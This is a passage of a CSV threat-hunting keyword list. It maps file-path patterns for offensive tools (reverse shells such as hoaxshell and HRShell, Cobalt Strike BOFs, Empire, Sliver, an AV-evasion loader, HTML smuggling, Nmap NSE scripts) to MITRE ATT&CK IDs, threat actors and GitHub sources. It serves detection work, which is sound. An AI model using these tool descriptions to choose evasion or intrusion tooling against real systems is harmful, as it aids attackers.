This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*/hijack_opener/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/hijack_opener/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/HijackHunter/*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/HInvoke.cs*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*/hlldz*,offensive_tool_keyword,Github Username,github username. 'My name is Halil Dalabasmaz. I consider myself Pwner.' containing exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/hlldz,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hnap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hoaxshell*,offensive_tool_keyword,hoaxshell,An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic,T1203 - T1133 - T1190,TA0001 - TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/t3l3machus/hoaxshell,1,1,N/A,N/A,10,2655,443,2023-06-18T13:26:32Z,2022-07-10T15:36:24Z -*/hoaxshell/*.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*/holehe.git*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,1,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*/hollow.x64.*,offensive_tool_keyword,cobaltstrike,EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. 
hijack main thread with APC and execute shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/HOLLOW,1,1,N/A,10,10,235,56,2023-03-08T15:51:19Z,2021-07-21T15:58:18Z -*/HookDetector.exe*,offensive_tool_keyword,HookDetector,"Detects hooked Native API functions in the current process indicating the presence of EDR ",T1055.012 - T1082 - T1057,TA0007 - TA0003,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/hooks/spoof.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z -*/hop.php*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/horizon3ai/*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,1,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z 
-*/hostenum.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,1,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*/hostmap-bfk.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hostmap-crtsh.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/hostmap-robtex.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/HouQing/*/Loader.go,offensive_tool_keyword,cobaltstrike,Hou Qing-Advanced AV Evasion Tool For Red Team Ops,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Hangingsword/HouQing,1,1,N/A,10,10,205,59,2021-01-14T08:38:12Z,2021-01-14T07:13:21Z -*/HRShell.git*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*/HRShell/*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*/hta_attack/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/HTMLSmuggler.git*,offensive_tool_keyword,HTMLSmuggler,HTML Smuggling generator&obfuscator for your Red Team operations,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/D00Movenok/HTMLSmuggler,1,1,N/A,10,1,97,13,2023-09-13T22:26:51Z,2023-07-02T08:10:59Z -*/HTMLSmuggler/*,offensive_tool_keyword,HTMLSmuggler,HTML Smuggling generator&obfuscator for your Red Team operations,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/D00Movenok/HTMLSmuggler,1,1,N/A,10,1,97,13,2023-09-13T22:26:51Z,2023-07-02T08:10:59Z -*/htshells.git*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*/http_payload.ps1*,offensive_tool_keyword,hoaxshell,An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic,T1203 - T1133 - T1190,TA0001 - TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/t3l3machus/hoaxshell,1,1,N/A,N/A,10,2655,443,2023-06-18T13:26:32Z,2022-07-10T15:36:24Z -*/http-adobe-coldfusion-apsa1301.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-affiliate-id.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-apache-negotiation.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-apache-server-status.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-aspnet-debug.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/httpattack.py*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*/http-auth.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-auth-finder.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-avaya-ipoffice-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-awstatstotals-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-axis2-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-backup-finder.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-barracuda-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-bigip-cookie.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-c2.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/http-cakephp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-chrono.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-cisco-anyconnect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-coldfusion-subzero.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-comments-displayer.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-config-backup.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-cookie-flags.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-cors.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-cross-domain-policy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-csrf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-date.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-default-accounts.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-devframework.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-dlink-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-dombased-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-domino-enum-passwords.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-drupal-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - 